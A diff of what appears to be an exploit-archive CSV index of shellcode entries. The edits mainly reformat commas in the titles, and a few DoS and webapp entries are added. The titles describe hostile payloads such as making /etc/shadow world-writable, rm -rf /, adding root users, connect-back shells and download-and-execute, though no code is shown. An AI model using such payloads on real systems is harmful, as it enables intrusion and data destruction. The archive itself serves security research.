reboot() polymorphic shellcode 57 bytes",2009-06-29,"Jonathan Salwan",lin_x86,shellcode,0 -13315,platforms/lin_x86/shellcode/13315.c,"linux/x86 Shellcode Polymorphic chmod(""/etc/shadow"",666) 54 bytes",2009-06-22,"Jonathan Salwan",lin_x86,shellcode,0 -13316,platforms/lin_x86/shellcode/13316.c,"linux/x86 setreuid(geteuid(),geteuid()),execve(""/bin/sh"",0,0) 34 bytes",2009-06-16,blue9057,lin_x86,shellcode,0 +13315,platforms/lin_x86/shellcode/13315.c,"linux/x86 Shellcode Polymorphic chmod(""/etc/shadow""_666) (54 bytes)",2009-06-22,"Jonathan Salwan",lin_x86,shellcode,0 +13316,platforms/lin_x86/shellcode/13316.c,"linux/x86 setreuid(geteuid()_geteuid())_execve(""/bin/sh""_0_0) (34 bytes)",2009-06-16,blue9057,lin_x86,shellcode,0 13317,platforms/lin_x86/shellcode/13317.s,"linux/x86 bindport 8000 & execve iptables -F 176 bytes",2009-06-08,"Jonathan Salwan",lin_x86,shellcode,0 13318,platforms/lin_x86/shellcode/13318.s,"linux/x86 bindport 8000 & add user with root access 225+ bytes",2009-06-08,"Jonathan Salwan",lin_x86,shellcode,0 13319,platforms/lin_x86/shellcode/13319.s,"linux/x86 Bind ASM Code Linux 179 bytes.",2009-06-01,"Jonathan Salwan",lin_x86,shellcode,0 13320,platforms/lin_x86/shellcode/13320.c,"linux/x86-64 setuid(0) + execve(/bin/sh) 49 bytes",2009-05-14,evil.xi4oyu,lin_x86,shellcode,0 -13321,platforms/lin_x86/shellcode/13321.c,"Serial port shell binding, busybox Launching shellcode",2009-04-30,phar,lin_x86,shellcode,0 +13321,platforms/lin_x86/shellcode/13321.c,"Serial port shell binding & busybox Launching shellcode",2009-04-30,phar,lin_x86,shellcode,0 13322,platforms/lin_x86/shellcode/13322.c,"linux/x86 File unlinker 18 bytes + file path length",2009-03-03,darkjoker,lin_x86,shellcode,0 13323,platforms/lin_x86/shellcode/13323.c,"linux/x86 Perl script execution 99 bytes + script length",2009-03-03,darkjoker,lin_x86,shellcode,0 13324,platforms/lin_x86/shellcode/13324.c,"linux/x86 file reader 65 bytes + pathname",2009-02-27,certaindeath,lin_x86,shellcode,0 -13325,platforms/lin_x86/shellcode/13325.c,"linux/x86 chmod(""/etc/shadow"",666) & exit(0) 30 bytes",2009-02-20,"Jonathan Salwan",lin_x86,shellcode,0 +13325,platforms/lin_x86/shellcode/13325.c,"linux/x86 chmod(""/etc/shadow""_666) & exit(0) (30 bytes)",2009-02-20,"Jonathan Salwan",lin_x86,shellcode,0 13326,platforms/lin_x86/shellcode/13326.c,"linux/x86 killall5 shellcode 34 bytes",2009-02-04,"Jonathan Salwan",lin_x86,shellcode,0 13327,platforms/lin_x86/shellcode/13327.c,"linux/x86 PUSH reboot() - 30 bytes",2009-01-16,"Jonathan Salwan",lin_x86,shellcode,0 13328,platforms/lin_x86/shellcode/13328.c,"linux x86 shellcode obfuscator",2008-12-09,sm4x,lin_x86,shellcode,0 @@ -11772,12 +11810,12 @@ id,file,description,date,author,platform,type,port 13330,platforms/lin_x86/shellcode/13330.c,"linux/x86 append rsa key to /root/.ssh/authorized_keys2 295 bytes",2008-11-23,XenoMuta,lin_x86,shellcode,0 13331,platforms/lin_x86/shellcode/13331.c,"linux/x86 edit /etc/sudoers for full access 86 bytes",2008-11-19,Rick,lin_x86,shellcode,0 13332,platforms/lin_x86/shellcode/13332.c,"Ho' Detector (Promiscuous mode detector shellcode) 56 bytes",2008-11-18,XenoMuta,lin_x86,shellcode,0 -13333,platforms/lin_x86/shellcode/13333.txt,"linux/x86 setuid(0) & execve(/bin/sh,0,0) shellcode 28 bytes",2008-11-13,sch3m4,lin_x86,shellcode,0 -13334,platforms/lin_x86/shellcode/13334.txt,"linux/x86 setresuid(0,0,0) /bin/sh shellcode 35 bytes",2008-09-29,sorrow,lin_x86,shellcode,0 +13333,platforms/lin_x86/shellcode/13333.txt,"linux/x86 setuid(0) & execve(/bin/sh_0_0) shellcode (28 bytes)",2008-11-13,sch3m4,lin_x86,shellcode,0 +13334,platforms/lin_x86/shellcode/13334.txt,"linux/x86 setresuid(0_0_0) /bin/sh shellcode (35 bytes)",2008-09-29,sorrow,lin_x86,shellcode,0 13335,platforms/lin_x86/shellcode/13335.c,"linux/x86 iopl(3); asm(cli); while(1){} 12 bytes",2008-09-17,dun,lin_x86,shellcode,0 13336,platforms/lin_x86/shellcode/13336.c,"linux/x86 system-beep shellcode 45 bytes",2008-09-09,"Thomas Rinsma",lin_x86,shellcode,0 -13337,platforms/lin_x86/shellcode/13337.c,"linux/x86 connect back, download a file and execute 149 bytes",2008-08-25,militan,lin_x86,shellcode,0 -13338,platforms/lin_x86/shellcode/13338.c,"linux/86 setreuid(geteuid, geteuid) + execve(/bin/sh) shellcode",2008-08-19,Reth,lin_x86,shellcode,0 +13337,platforms/lin_x86/shellcode/13337.c,"linux/x86 connect back_ download a file and execute (149 bytes)",2008-08-25,militan,lin_x86,shellcode,0 +13338,platforms/lin_x86/shellcode/13338.c,"linux/86 setreuid(geteuid_ geteuid) + execve(/bin/sh) shellcode",2008-08-19,Reth,lin_x86,shellcode,0 13339,platforms/lin_x86/shellcode/13339.asm,"linux/x86 connect back.send.exit /etc/shadow 155 bytes",2008-08-18,0in,lin_x86,shellcode,0 13340,platforms/lin_x86/shellcode/13340.c,"linux/x86 writes a php connectback shell to the fs 508 bytes",2008-08-18,GS2008,lin_x86,shellcode,0 13341,platforms/lin_x86/shellcode/13341.c,"linux/x86 rm -rf / attempts to block the process from being stopped",2008-08-18,onionring,lin_x86,shellcode,0 @@ -11794,7 +11832,7 @@ id,file,description,date,author,platform,type,port 13352,platforms/lin_x86/shellcode/13352.c,"linux/x86 execve(rm -rf /) shellcode 45 bytes",2006-11-17,"Kris Katterjohn",lin_x86,shellcode,0 13353,platforms/lin_x86/shellcode/13353.c,"linux/x86 setuid(0) + execve(/bin/sh) 28 bytes",2006-11-16,Revenge,lin_x86,shellcode,0 13354,platforms/lin_x86/shellcode/13354.c,"linux/x86 execve(/bin/sh) 22 bytes",2006-11-16,Revenge,lin_x86,shellcode,0 -13355,platforms/lin_x86/shellcode/13355.c,"linux/x86 HTTP/1.x GET, Downloads and execve() 111 bytes+",2006-10-22,izik,lin_x86,shellcode,0 +13355,platforms/lin_x86/shellcode/13355.c,"linux/x86 HTTP/1.x GET_ Downloads and execve() (111 bytes+)",2006-10-22,izik,lin_x86,shellcode,0 13356,platforms/lin_x86/shellcode/13356.c,"linux/x86 executes command after setreuid (9 + 40 bytes + cmd)",2006-08-02,bunker,lin_x86,shellcode,0 13357,platforms/lin_x86/shellcode/13357.c,"linux/x86 stdin re-open and /bin/sh exec shellcode",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0 13358,platforms/lin_x86/shellcode/13358.c,"linux/x86 re-use of /bin/sh string in .rodata shellcode 16 bytes",2006-07-20,"Marco Ivaldi",lin_x86,shellcode,0 @@ -11814,12 +11852,12 @@ id,file,description,date,author,platform,type,port 13372,platforms/lin_x86/shellcode/13372.c,"linux/x86 SWAP store shellcode 99 bytes",2006-04-16,"Gotfault Security",lin_x86,shellcode,0 13373,platforms/lin_x86/shellcode/13373.c,"linux/x86 Password Authentication portbind Shellcode 166 bytes",2006-04-06,"Gotfault Security",lin_x86,shellcode,0 13374,platforms/lin_x86/shellcode/13374.c,"linux/x86 portbind (port 64713) 86 bytes",2006-04-06,"Gotfault Security",lin_x86,shellcode,0 -13375,platforms/lin_x86/shellcode/13375.c,"linux/x86 execve(""/bin/sh"", [""/bin/sh"", NULL]) 25 bytes",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 -13376,platforms/lin_x86/shellcode/13376.c,"linux/x86 execve(""/bin/sh"", [""/bin/sh"", NULL]) 23 bytes",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 -13377,platforms/lin_x86/shellcode/13377.c,"linux/x86 setuid(0) + execve(""/bin/sh"", [""/bin/sh"", NULL]) 31 bytes",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 -13378,platforms/lin_x86/shellcode/13378.c,"linux/x86 setuid(0),setgid(0) execve(/bin/sh, [/bin/sh, NULL]) 37 bytes",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 -13379,platforms/lin_x86/shellcode/13379.c,"linux/x86 setreuid(0,0) execve(""/bin/sh"", [""/bin/sh"", NULL]) 33 bytes",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 -13380,platforms/lin_x86/shellcode/13380.c,"linux/x86 HTTP/1.x GET, Downloads and JMP - 68 bytes+",2006-03-12,izik,lin_x86,shellcode,0 +13375,platforms/lin_x86/shellcode/13375.c,"linux/x86 execve(""/bin/sh""_ [""/bin/sh""_ NULL]) (25 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 +13376,platforms/lin_x86/shellcode/13376.c,"linux/x86 execve(""/bin/sh""_ [""/bin/sh""_ NULL]) (23 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 +13377,platforms/lin_x86/shellcode/13377.c,"linux/x86 setuid(0) + execve(""/bin/sh""_ [""/bin/sh""_ NULL]) (31 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 +13378,platforms/lin_x86/shellcode/13378.c,"linux/x86 setuid(0)_setgid(0) execve(/bin/sh_ [/bin/sh_ NULL]) (37 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 +13379,platforms/lin_x86/shellcode/13379.c,"linux/x86 setreuid(0_0) execve(""/bin/sh""_ [""/bin/sh""_ NULL]) (33 bytes)",2006-04-03,"Gotfault Security",lin_x86,shellcode,0 +13380,platforms/lin_x86/shellcode/13380.c,"linux/x86 HTTP/1.x GET_ Downloads and JMP - (68 bytes+)",2006-03-12,izik,lin_x86,shellcode,0 13381,platforms/lin_x86/shellcode/13381.c,"linux/x86 TCP Proxy Shellcode 236 bytes",2006-02-07,phar,lin_x86,shellcode,0 13382,platforms/lin_x86/shellcode/13382.c,"linux/x86 execve /bin/sh anti-ids 40 bytes",2006-01-26,NicatiN,lin_x86,shellcode,0 13383,platforms/lin_x86/shellcode/13383.c,"linux/x86 execve /bin/sh xored for Intel x86 CPUID 41 bytes",2006-01-25,izik,lin_x86,shellcode,0 @@ -11831,22 +11869,22 @@ id,file,description,date,author,platform,type,port 13389,platforms/lin_x86/shellcode/13389.c,"linux/x86 24/7 open cd-rom loop (follows /dev/cdrom symlink) 39 bytes",2006-01-21,izik,lin_x86,shellcode,0 13390,platforms/lin_x86/shellcode/13390.c,"linux/x86 eject cd-rom (follows /dev/cdrom symlink) + exit() 40 bytes",2006-01-21,izik,lin_x86,shellcode,0 13391,platforms/lin_x86/shellcode/13391.c,"linux/x86 eject/close cd-rom loop (follows /dev/cdrom symlink) 45 bytes",2006-01-21,izik,lin_x86,shellcode,0 -13392,platforms/lin_x86/shellcode/13392.c,"linux/x86 chmod(/etc/shadow, 0666) + exit() 32 bytes",2006-01-21,izik,lin_x86,shellcode,0 +13392,platforms/lin_x86/shellcode/13392.c,"linux/x86 chmod(/etc/shadow_ 0666) + exit() (32 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13393,platforms/lin_x86/shellcode/13393.c,"linux/x86 connect-back shellcode 127.0.0.1:31337/tcp 74 bytes",2006-01-21,izik,lin_x86,shellcode,0 13394,platforms/lin_x86/shellcode/13394.c,"linux/x86 normal exit with random (so to speak) return value 5 bytes",2006-01-21,izik,lin_x86,shellcode,0 13395,platforms/lin_x86/shellcode/13395.c,"linux/x86 getppid() + execve(/proc/pid/exe) 51 bytes",2006-01-21,izik,lin_x86,shellcode,0 -13396,platforms/lin_x86/shellcode/13396.c,"linux/x86 quick (yet conditional, eax != 0 and edx == 0) exit 4 bytes",2006-01-21,izik,lin_x86,shellcode,0 +13396,platforms/lin_x86/shellcode/13396.c,"linux/x86 quick (yet conditional_ eax != 0 and edx == 0) exit (4 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13397,platforms/lin_x86/shellcode/13397.c,"linux/x86 reboot() - 20 bytes",2006-01-21,izik,lin_x86,shellcode,0 -13398,platforms/lin_x86/shellcode/13398.c,"linux/x86 setreuid(0, 0) + execve(/bin/sh) 31 bytes",2006-01-21,izik,lin_x86,shellcode,0 +13398,platforms/lin_x86/shellcode/13398.c,"linux/x86 setreuid(0_ 0) + execve(/bin/sh) (31 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13399,platforms/lin_x86/shellcode/13399.c,"linux/x86 execve(/bin/sh) / PUSH - 23 bytes",2006-01-21,izik,lin_x86,shellcode,0 -13400,platforms/lin_x86/shellcode/13400.c,"linux/x86 cat /dev/urandom > /dev/console, just for kicks - 63 bytes",2006-01-21,izik,lin_x86,shellcode,0 +13400,platforms/lin_x86/shellcode/13400.c,"linux/x86 cat /dev/urandom > /dev/console (63 bytes)",2006-01-21,izik,lin_x86,shellcode,0 13401,platforms/lin_x86/shellcode/13401.c,"linux/x86 Connect Back shellcode 90 bytes",2005-12-28,xort,lin_x86,shellcode,0 13402,platforms/lin_x86/shellcode/13402.c,"linux/x86 socket-proxy shellcode 372 bytes",2005-12-28,xort,lin_x86,shellcode,0 -13403,platforms/lin_x86/shellcode/13403.c,"linux/x86 dup2(0,0); dup2(0,1); dup2(0,2); 15 bytes",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 -13404,platforms/lin_x86/shellcode/13404.c,"linux/x86 if(read(fd,buf,512)<=2) _exit(1) else buf(); 29 bytes",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 +13403,platforms/lin_x86/shellcode/13403.c,"linux/x86 dup2(0_0); dup2(0_1); dup2(0_2); (15 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 +13404,platforms/lin_x86/shellcode/13404.c,"linux/x86 if(read(fd_buf_512)<=2) _exit(1) else buf(); (29 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 13405,platforms/lin_x86/shellcode/13405.c,"linux/x86 _exit(1); 7 bytes",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 -13406,platforms/lin_x86/shellcode/13406.c,"linux/x86 read(0,buf,2541); chmod(buf,4755); 23 bytes",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 -13407,platforms/lin_x86/shellcode/13407.c,"linux/x86 write(0,""Hello core!\n"",12); (with optional 7 byte exit) 36 bytes",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 +13406,platforms/lin_x86/shellcode/13406.c,"linux/x86 read(0_buf_2541); chmod(buf_4755); (23 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 +13407,platforms/lin_x86/shellcode/13407.c,"linux/x86 write(0_""Hello core!\n""_12); (with optional 7 byte exit) (36 bytes)",2005-11-09,"Charles Stevenson",lin_x86,shellcode,0 13408,platforms/lin_x86/shellcode/13408.c,"linux/x86 snoop /dev/dsp shellcode 172 bytes",2005-11-04,phar,lin_x86,shellcode,0 13409,platforms/lin_x86/shellcode/13409.c,"linux/x86 /bin/sh Standard Opcode Array Payload 21 Bytes",2005-09-15,c0ntex,lin_x86,shellcode,0 13410,platforms/lin_x86/shellcode/13410.s,"linux/x86 examples of long-term payloads hide-wait-change (.s)",2005-09-09,xort,lin_x86,shellcode,0 @@ -11862,7 +11900,7 @@ id,file,description,date,author,platform,type,port 13420,platforms/lin_x86/shellcode/13420.c,"linux/x86 Radically Self Modifying Code 70 bytes",2004-12-22,xort,lin_x86,shellcode,0 13421,platforms/lin_x86/shellcode/13421.c,"linux/x86 Magic Byte Self Modifying Code 76 bytes",2004-12-22,xort,lin_x86,shellcode,0 13422,platforms/lin_x86/shellcode/13422.c,"linux/x86 execve code 23 bytes",2004-11-15,marcetam,lin_x86,shellcode,0 -13423,platforms/lin_x86/shellcode/13423.c,"linux/x86 execve(""/bin/ash"",0,0); 21 bytes",2004-11-15,zasta,lin_x86,shellcode,0 +13423,platforms/lin_x86/shellcode/13423.c,"linux/x86 execve(""/bin/ash""_0_0); (21 bytes)",2004-11-15,zasta,lin_x86,shellcode,0 13424,platforms/lin_x86/shellcode/13424.txt,"linux/x86 execve /bin/sh alphanumeric 392 bytes",2004-09-26,RaiSe,lin_x86,shellcode,0 13425,platforms/lin_x86/shellcode/13425.c,"linux/x86 execve /bin/sh IA32 0xff-less 45 bytes",2004-09-26,anathema,lin_x86,shellcode,0 13426,platforms/lin_x86/shellcode/13426.c,"linux/x86 symlink /bin/sh xoring 56 bytes",2004-09-26,dev0id,lin_x86,shellcode,0 @@ -11886,7 +11924,7 @@ id,file,description,date,author,platform,type,port 13444,platforms/lin_x86/shellcode/13444.c,"linux/x86 execve /bin/sh 24 bytes",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 13445,platforms/lin_x86/shellcode/13445.c,"linux/x86 execve /bin/sh 38 bytes",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 13446,platforms/lin_x86/shellcode/13446.c,"linux/x86 execve /bin/sh 30 bytes",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 -13447,platforms/lin_x86/shellcode/13447.c,"linux/x86 execve /bin/sh setreuid(12,12) 50 bytes",2004-09-12,N/A,lin_x86,shellcode,0 +13447,platforms/lin_x86/shellcode/13447.c,"linux/x86 execve /bin/sh setreuid(12_12) (50 bytes)",2004-09-12,N/A,lin_x86,shellcode,0 13448,platforms/lin_x86/shellcode/13448.c,"linux/x86 portbind port 5074 92 bytes",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 13449,platforms/lin_x86/shellcode/13449.c,"linux/x86 portbind port 5074 + fork() 130 bytes",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 13450,platforms/lin_x86/shellcode/13450.c,"linux/x86 add user t00r 82 bytes",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 @@ -11897,28 +11935,28 @@ id,file,description,date,author,platform,type,port 13455,platforms/lin_x86/shellcode/13455.c,"linux/x86 execve /bin/sh encrypted 58 bytes",2004-09-12,"Matias Sedalo",lin_x86,shellcode,0 13456,platforms/lin_x86/shellcode/13456.c,"linux/x86 execve /bin/sh xor encrypted 55 bytes",2004-09-12,N/A,lin_x86,shellcode,0 13457,platforms/lin_x86/shellcode/13457.c,"linux/x86 execve /bin/sh tolower() evasion 41 bytes",2004-09-12,N/A,lin_x86,shellcode,0 -13458,platforms/lin_x86/shellcode/13458.c,"execve of /bin/sh after setreuid(0,0)",2001-05-07,"Marco Ivaldi",lin_x86,shellcode,0 +13458,platforms/lin_x86/shellcode/13458.c,"execve of /bin/sh after setreuid(0_0)",2001-05-07,"Marco Ivaldi",lin_x86,shellcode,0 13459,platforms/lin_x86/shellcode/13459.c,"linux chroot()/execve() code",2001-01-13,preedator,lin_x86,shellcode,0 13460,platforms/lin_x86/shellcode/13460.c,"linux/x86 execve /bin/sh toupper() evasion 55 bytes",2000-08-08,N/A,lin_x86,shellcode,0 13461,platforms/lin_x86/shellcode/13461.c,"linux/x86 add user 70 bytes",2000-08-07,N/A,lin_x86,shellcode,0 13462,platforms/lin_x86/shellcode/13462.c,"linux/x86 break chroot setuid(0) + /bin/sh 132 bytes",2000-08-07,N/A,lin_x86,shellcode,0 13463,platforms/lin_x86-64/shellcode/13463.c,"linux/x86-64 bindshell port:4444 shellcode 132 bytes",2009-05-18,evil.xi4oyu,lin_x86-64,shellcode,0 13464,platforms/lin_x86-64/shellcode/13464.s,"linux/x86-64 execve(/bin/sh) 33 bytes",2006-11-02,hophet,lin_x86-64,shellcode,0 -13465,platforms/multiple/shellcode/13465.c,"linux/PPC/x86 execve(""/bin/sh"",{""/bin/sh"",NULL},NULL) 99 bytes",2005-11-15,"Charles Stevenson",multiple,shellcode,0 -13466,platforms/multiple/shellcode/13466.c,"os-x/PPC/x86 execve(""/bin/sh"",{""/bin/sh"",NULL},NULL) 121 bytes",2005-11-13,nemo,multiple,shellcode,0 +13465,platforms/multiple/shellcode/13465.c,"linux/PPC/x86 execve(""/bin/sh""_{""/bin/sh""_NULL}_NULL) (99 bytes)",2005-11-15,"Charles Stevenson",multiple,shellcode,0 +13466,platforms/multiple/shellcode/13466.c,"os-x/PPC/x86 execve(""/bin/sh""_{""/bin/sh""_NULL}_NULL) (121 bytes)",2005-11-13,nemo,multiple,shellcode,0 13467,platforms/multiple/shellcode/13467.c,"linux/x86 unix/SPARC irix/mips execve /bin/sh irx.mips 141 bytes",2004-09-12,dymitri,multiple,shellcode,0 13468,platforms/multiple/shellcode/13468.c,"linux/x86 unix/SPARC execve /bin/sh 80 bytes",2004-09-12,dymitri,multiple,shellcode,0 13469,platforms/multiple/shellcode/13469.c,"linux/x86 bsd/x86 execve /bin/sh 38 bytes",2004-09-12,dymitri,multiple,shellcode,0 13470,platforms/netbsd_x86/shellcode/13470.c,"netbsd/x86 kill all processes shellcode 23 bytes",2009-06-18,anonymous,netbsd_x86,shellcode,0 13471,platforms/netbsd_x86/shellcode/13471.c,"netbsd/x86 callback shellcode (port 6666) 83 bytes",2005-11-30,"p. minervini",netbsd_x86,shellcode,0 -13472,platforms/netbsd_x86/shellcode/13472.c,"netbsd/x86 setreuid(0, 0); execve(""/bin//sh"", ..., NULL); 29 bytes",2005-11-30,"p. minervini",netbsd_x86,shellcode,0 -13473,platforms/netbsd_x86/shellcode/13473.c,"netbsd/x86 setreuid(0, 0); execve(""/bin//sh"", ..., NULL); 30 bytes",2005-11-30,"p. minervini",netbsd_x86,shellcode,0 +13472,platforms/netbsd_x86/shellcode/13472.c,"netbsd/x86 setreuid(0_ 0); execve(""/bin//sh""_ ..._ NULL); (29 bytes)",2005-11-30,"p. minervini",netbsd_x86,shellcode,0 +13473,platforms/netbsd_x86/shellcode/13473.c,"netbsd/x86 setreuid(0_ 0); execve(""/bin//sh""_ ..._ NULL); (30 bytes)",2005-11-30,"p. minervini",netbsd_x86,shellcode,0 13474,platforms/netbsd_x86/shellcode/13474.txt,"netbsd/x86 execve /bin/sh 68 bytes",2004-09-26,humble,netbsd_x86,shellcode,0 13475,platforms/openbsd_x86/shellcode/13475.c,"openbsd/x86 execve(/bin/sh) 23 bytes",2006-05-01,hophet,openbsd_x86,shellcode,0 13476,platforms/openbsd_x86/shellcode/13476.c,"openbsd/x86 portbind port 6969 148 bytes",2004-09-26,"Sinan Eren",openbsd_x86,shellcode,0 13477,platforms/openbsd_x86/shellcode/13477.c,"openbsd/x86 add user w00w00 112 bytes",2004-09-26,N/A,openbsd_x86,shellcode,0 -13478,platforms/osx_ppc/shellcode/13478.c,"os-x/ppc sync(), reboot() 32 bytes",2006-05-01,hophet,osx_ppc,shellcode,0 -13479,platforms/osx_ppc/shellcode/13479.c,"os-x/ppc execve(/bin/sh), exit() 72 bytes",2006-05-01,hophet,osx_ppc,shellcode,0 +13478,platforms/osx_ppc/shellcode/13478.c,"os-x/ppc sync()_ reboot() (32 bytes)",2006-05-01,hophet,osx_ppc,shellcode,0 +13479,platforms/osx_ppc/shellcode/13479.c,"os-x/ppc execve(/bin/sh)_ exit() (72 bytes)",2006-05-01,hophet,osx_ppc,shellcode,0 13480,platforms/osx_ppc/shellcode/13480.c,"os-x/PPC Add user r00t 219 bytes",2004-09-26,B-r00t,osx_ppc,shellcode,0 13481,platforms/osx_ppc/shellcode/13481.c,"os-x/PPC execve /bin/sh 72 bytes",2004-09-26,B-r00t,osx_ppc,shellcode,0 13482,platforms/osx_ppc/shellcode/13482.c,"os-x/PPC add inetd backdoor 222 bytes",2004-09-26,B-r00t,osx_ppc,shellcode,0 @@ -11927,7 +11965,7 @@ id,file,description,date,author,platform,type,port 13485,platforms/osx_ppc/shellcode/13485.c,"os-x/PPC create /tmp/suid 122 bytes",2004-09-26,B-r00t,osx_ppc,shellcode,0 13486,platforms/osx_ppc/shellcode/13486.c,"os-x/PPC simple write() 75 bytes",2004-09-26,B-r00t,osx_ppc,shellcode,0 13487,platforms/osx_ppc/shellcode/13487.c,"os-x/PPC execve /usr/X11R6/bin/xterm 141 bytes",2004-09-26,B-r00t,osx_ppc,shellcode,0 -13488,platforms/sco_x86/shellcode/13488.c,"sco/x86 execve(""/bin/sh"", ..., NULL); 43 bytes",2005-11-30,"p. minervini",sco_x86,shellcode,0 +13488,platforms/sco_x86/shellcode/13488.c,"sco/x86 execve(""/bin/sh""_ ..._ NULL); (43 bytes)",2005-11-30,"p. minervini",sco_x86,shellcode,0 13489,platforms/solaris_sparc/shellcode/13489.c,"solaris/sparc download and execute 278 bytes",2006-11-21,xort,solaris_sparc,shellcode,0 13490,platforms/solaris_sparc/shellcode/13490.c,"solaris/sparc executes command after setreuid (92 bytes + cmd)",2006-10-21,bunker,solaris_sparc,shellcode,0 13491,platforms/solaris_sparc/shellcode/13491.c,"solaris/sparc connect-back (with XNOR encoded session) 600 bytes",2006-07-21,xort,solaris_sparc,shellcode,0 @@ -11938,13 +11976,16 @@ id,file,description,date,author,platform,type,port 13496,platforms/solaris_sparc/shellcode/13496.c,"solaris/SPARC connect-back 204 bytes",2004-09-26,"Claes Nyberg",solaris_sparc,shellcode,0 13497,platforms/solaris_sparc/shellcode/13497.txt,"solaris/SPARC portbinding shellcode",2000-11-19,dopesquad.net,solaris_sparc,shellcode,0 13498,platforms/solaris_x86/shellcode/13498.php,"solaris/x86 portbind/tcp shellcode generator",2009-06-16,"Jonathan Salwan",solaris_x86,shellcode,0 -13499,platforms/solaris_x86/shellcode/13499.c,"solaris/x86 setuid(0), execve(//bin/sh); exit(0) NULL Free 39 bytes",2008-12-02,sm4x,solaris_x86,shellcode,0 -13500,platforms/solaris_x86/shellcode/13500.c,"solaris/x86 setuid(0), execve(/bin/cat, /etc/shadow), exit(0) 59 bytes",2008-12-02,sm4x,solaris_x86,shellcode,0 +13499,platforms/solaris_x86/shellcode/13499.c,"solaris/x86 setuid(0)_ execve(//bin/sh); exit(0) NULL Free (39 bytes)",2008-12-02,sm4x,solaris_x86,shellcode,0 +13500,platforms/solaris_x86/shellcode/13500.c,"solaris/x86 setuid(0)_ execve(/bin/cat_ /etc/shadow)_ exit(0) (59 bytes)",2008-12-02,sm4x,solaris_x86,shellcode,0 13501,platforms/solaris_x86/shellcode/13501.txt,"solaris/x86 execve /bin/sh toupper evasion 84 bytes",2004-09-26,N/A,solaris_x86,shellcode,0 13502,platforms/solaris_x86/shellcode/13502.txt,"solaris/x86 add services and execve inetd 201 bytes",2004-09-26,N/A,solaris_x86,shellcode,0 13503,platforms/unixware/shellcode/13503.txt,"Unixware execve /bin/sh 95 bytes",2004-09-26,K2,unixware,shellcode,0 13504,platforms/win32/shellcode/13504.asm,"Windows x86 null-free bindshell for Windows 5.0-7.0 all service packs",2009-07-27,Skylined,win32,shellcode,0 13505,platforms/win32/shellcode/13505.c,"win32/xp sp2 (En) cmd.exe 23 bytes",2009-07-17,Stack,win32,shellcode,0 +18615,platforms/windows/dos/18615.py,"TypesoftFTP Server 1.1 - Remote DoS (APPE)",2012-03-17,"brock haun",windows,dos,0 +18593,platforms/php/webapps/18593.txt,"ModX 2.2.0 - Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0 +18594,platforms/php/webapps/18594.txt,"Simple Posting System Multiple Vulnerabilities",2012-03-14,n0tch,php,webapps,0 13507,platforms/win32/shellcode/13507.txt,"win32 SEH omelet shellcode 0.1",2009-03-16,Skylined,win32,shellcode,0 13508,platforms/win32/shellcode/13508.asm,"win32 telnetbind by winexec 111 bytes",2009-02-27,DATA_SNIPER,win32,shellcode,0 13509,platforms/win32/shellcode/13509.c,"win32 PEB!NtGlobalFlags shellcode 14 bytes",2009-02-24,Koshi,win32,shellcode,0 @@ -11952,7 +11993,7 @@ id,file,description,date,author,platform,type,port 13511,platforms/win32/shellcode/13511.c,"win32/xp sp2 Shellcode cmd.exe 57 bytes",2009-02-03,Stack,win32,shellcode,0 13512,platforms/win32/shellcode/13512.c,"win32 PEB Kernel32.dll ImageBase Finder Alphanumeric 67 bytes",2008-09-03,Koshi,win32,shellcode,0 13513,platforms/win32/shellcode/13513.c,"win32 PEB Kernel32.dll ImageBase Finder (Ascii Printable) 49 bytes",2008-09-03,Koshi,win32,shellcode,0 -13514,platforms/win32/shellcode/13514.asm,"win32 connectback, receive, save and execute shellcode",2008-08-25,loco,win32,shellcode,0 +13514,platforms/win32/shellcode/13514.asm,"win32 connectback_ receive_ save and execute shellcode",2008-08-25,loco,win32,shellcode,0 13515,platforms/win32/shellcode/13515.pl,"win32 Download and Execute Shellcode Generator (browsers edition)",2008-03-14,"YAG KOHHA",win32,shellcode,0 13516,platforms/win32/shellcode/13516.asm,"win32 Tiny Download and Exec Shellcode 192 bytes",2007-06-27,czy,win32,shellcode,0 13517,platforms/win32/shellcode/13517.asm,"win32 download and execute 124 bytes",2007-06-14,Weiss,win32,shellcode,0 @@ -11975,12 +12016,13 @@ id,file,description,date,author,platform,type,port 13548,platforms/lin_x86/shellcode/13548.asm,"linux/x86 kill all processes 9 bytes",2010-01-14,root@thegibson,lin_x86,shellcode,0 13549,platforms/lin_x86/shellcode/13549.c,"Linux - setuid(0) & execve(""/sbin/poweroff -f"")",2009-12-04,ka0x,lin_x86,shellcode,0 13550,platforms/lin_x86/shellcode/13550.c,"Linux - setuid(0) and cat /etc/shadow",2009-12-04,ka0x,lin_x86,shellcode,0 -13551,platforms/lin_x86/shellcode/13551.c,"Linux - chmod(/etc/shadow, 0666) & exit() - 33 bytes",2009-12-04,ka0x,lin_x86,shellcode,0 +13551,platforms/lin_x86/shellcode/13551.c,"Linux - chmod(/etc/shadow_ 0666) & exit() (33 bytes)",2009-12-04,ka0x,lin_x86,shellcode,0 13553,platforms/lin_x86/shellcode/13553.c,"Linux - linux/x86 execve() - 51bytes",2009-12-04,"fl0 fl0w",lin_x86,shellcode,0 